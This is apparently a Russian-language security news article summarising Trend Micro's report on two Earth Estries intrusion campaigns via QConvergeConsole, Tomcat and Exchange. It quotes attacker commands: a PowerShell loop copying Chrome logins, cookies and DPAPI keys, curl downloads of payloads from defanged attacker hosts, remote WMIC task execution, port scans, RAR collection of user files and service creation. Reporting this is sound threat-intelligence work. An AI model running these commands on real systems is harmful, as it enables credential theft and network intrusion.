Earth Estries: Trend Micro раскрывает виртуозные уловки хакеров-невидимок

leer en español

Earth Estries: Trend Micro раскрывает виртуозные уловки хакеров-невидимок

За кулисами изощренных кибератак на корпоративные сети.

image

Trend Micro подробно рассказала о двух масштабных хакерских кампаниях, запущенных группировкой Earth Estries. Злоумышленники применили продвинутые техники проникновения в корпоративные системы через уязвимости в широко распространенном программном обеспечении.

Первая схема атаки сфокусировалась на эксплуатации QConvergeConsole - инструмента для управления оптоволоконными адаптерами QLogic. После получения начального доступа хакеры использовали утилиты PsExec и WMIC для распространения вредоноса по сети.

Исследователи отмечают, что злоумышленники эксплуатировали уязвимости или некорректные настройки QConvergeConsole через установленный агент удаленного приложения (c:\program files\qlogic corporation\nqagent\netqlremote.exe), который позволял проводить сетевое сканирование и устанавливать Cobalt Strike на целевые машины.

В другом случае группировка использовала уязвимость в Apache Tomcat6, поставляемом с QConvergeConsole (c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe), для бокового перемещения и управления инструментами поздних стадий атаки.

Группировка также активно применяла различные бэкдоры для закрепления в системе. Среди них - Cobalt Strike, Trillclient, Hemigate и новый образец под названием Crowdoor. Вредоносное ПО доставлялось на зараженные машины в виде CAB-архивов.

Особое внимание привлекает инструмент Trillclient, который похищал учетные данные из кэша браузеров. С его помощью злоумышленники получали дополнительный контроль над скомпрометированными системами. Earth Estries демонстрировали глубокое понимание инфраструктуры жертв - они напрямую скачивали документы из внутренних веб-хранилищ с помощью команды wget.

Trillclient запускал PowerShell-скрипт для сбора профилей пользователей:

foreach($win_user_path in $users_path){

echo D | xcopy \"C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect\" \"$copy_dest_path\$win_user_path\Protect\" /E /C /H;

attrib -a -s -r -h \"$copy_dest_path\$win_user_path\*\" /S /D;

echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State\" \"$copy_dest_path\$win_user_path\Local State\" /C;

echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\" \"$copy_dest_path\$win_user_path\Default\Network\Cookies\" /C

echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"$copy_dest_path\$win_user_path\Default\Login Data\" /C;

}

Во второй схеме атаки хакеры эксплуатировали уязвимости в Microsoft Exchange. На серверы устанавливался веб-шелл ChinaCopper, через который злоумышленники разворачивали Cobalt Strike и другие инструменты для бокового перемещения по сети.

Ключевыми компонентами этой цепочки стали бэкдоры Zingdoor и SnappyBee (известный также как Deed RAT). Вредоносное ПО загружалось либо с управляющих серверов, либо через curl-запросы к подконтрольным хакерам сайтам. Типичные команды для загрузки инструментов выглядели так:

curl -o c:\windows\ime\imejp\VXTR hxxp://96[.]44[.]160[.]181/VXTR.txt

curl -k -o C:\programdata\UNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx

curl -k -o C:\programdata\portscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx

В отличие от первой схемы, здесь основной акцент делался на эксплуатации Exchange и частом обновлении вредоносных программ для избежания обнаружения. Группировка активно использовала PortScan для картографирования сетей, а дополнительные бэкдоры помогали в сборе и экспорте документов через RAR-архивы.

Earth Estries уделяли особое внимание скрытному присутствию в сетях жертв. Они регулярно обновляли свои инструменты и заметали следы, удаляя старые версии вредоносного ПО. Длительное присутствие обеспечивалось различными кастомными бэкдорами, включая недавно обнаруженный Crowdoor, который взаимодействовал с Cobalt Strike.

Для закрепления в системе злоумышленники использовали различные методы создания задач по расписанию, в том числе удаленное создание через WMIC:

wmic /node:<IP> /user:<domain>\<user> /password:***** process call create "schtasks /run /tn microsoft\sihost"

Исследователи выявили несколько техник, применяемых группировкой. Помимо кражи учетных данных через Trillclient, хакеры маскировали командный трафик через локальные и удаленные прокси-серверы.

Для разведки сетевой инфраструктуры использовались PortScan и специальные скрипты. После скачивания утилиты PortScan злоумышленники проводили сканирование сети на наличие открытых портов 80, 443, 445 и 3389:

cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443"

cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log"

Собранные данные упаковывались в зашифрованные RAR-архивы и выгружались через анонимные файлообменники. Примеры команд для сбора данных:

rar.exe a -m5 <install path>\his231.rar "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History"

rar.exe a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\<user name>\Downloads\* C:\users\<user name>\Documents\* -r -y -ta<cutoff date>

В ходе исследования были обнаружены дополнительные бэкдоры - FuxosDoor и Cryptmerlin. FuxosDoor работал как бэкдор для веб-сервера IIS, обеспечивая скрытую связь с командными серверами. Cryptmerlin использовал технику DLL sideloading для длительного контроля над зараженными машинами.

Zingdoor и SnappyBee функционировали как HTTP-бэкдоры, облегчая боковое перемещение по сети. SnappyBee представляет собой модульный бэкдор, считающийся преемником ShadowPad. Оба вредоноса использовали механизм DLL sideloading для внедрения в легитимные процессы.

Через веб-шелл ChinaChopper злоумышленники создавали удаленные службы для повышения привилегий и обеспечения персистентности:

sc \\{hostname} create VGAuthtools type= own start= auto binpath= "c:\windows\microsoft.net\Framework\v4.0.30319\Installutil.exe C:\Programdata\VMware\vmvssrv.exe"

Новый бэкдор Crowdoor, замеченный в первой цепочке атак, расширял возможности группировки по переустановке и обновлению Cobalt Strike на скомпрометированных системах. Он выполнял различные действия в зависимости от переданных аргументов, включая установку механизмов персистентности через реестр или службы.

Веб-шелл ChinaCopper, использованный во второй схеме, предоставлял удаленный контроль над зараженными серверами Exchange и служил плацдармом для дальнейшего проникновения в сеть.

Специалисты настоятельно рекомендуют организациям устранять уязвимости в сервисах, доступных извне, особенно в широко используемых приложениях вроде почтовых серверов и консолей управления.

Ищем баги вместе! Но не те, что в продакшене...

Разбираем кейсы, делимся опытом, учимся на чужих ошибках

Зафиксируйте уязвимость своих знаний — подпишитесь!